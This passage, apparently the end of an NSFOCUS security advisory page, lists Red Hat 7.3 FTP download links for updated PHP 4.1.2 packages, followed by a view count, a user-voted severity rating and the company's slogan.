ftp://updates.redhat.com/7.3/en/os/i386/php-odbc-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-imap-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-mysql-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-devel-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-snmp-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-ldap-4.1.2-7.3.3.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/php-pgsql-4.1.2-7.3.3.i386.rpm
浏览次数:5117
严重程度:0(网友投票)
绿盟科技给您安全的保障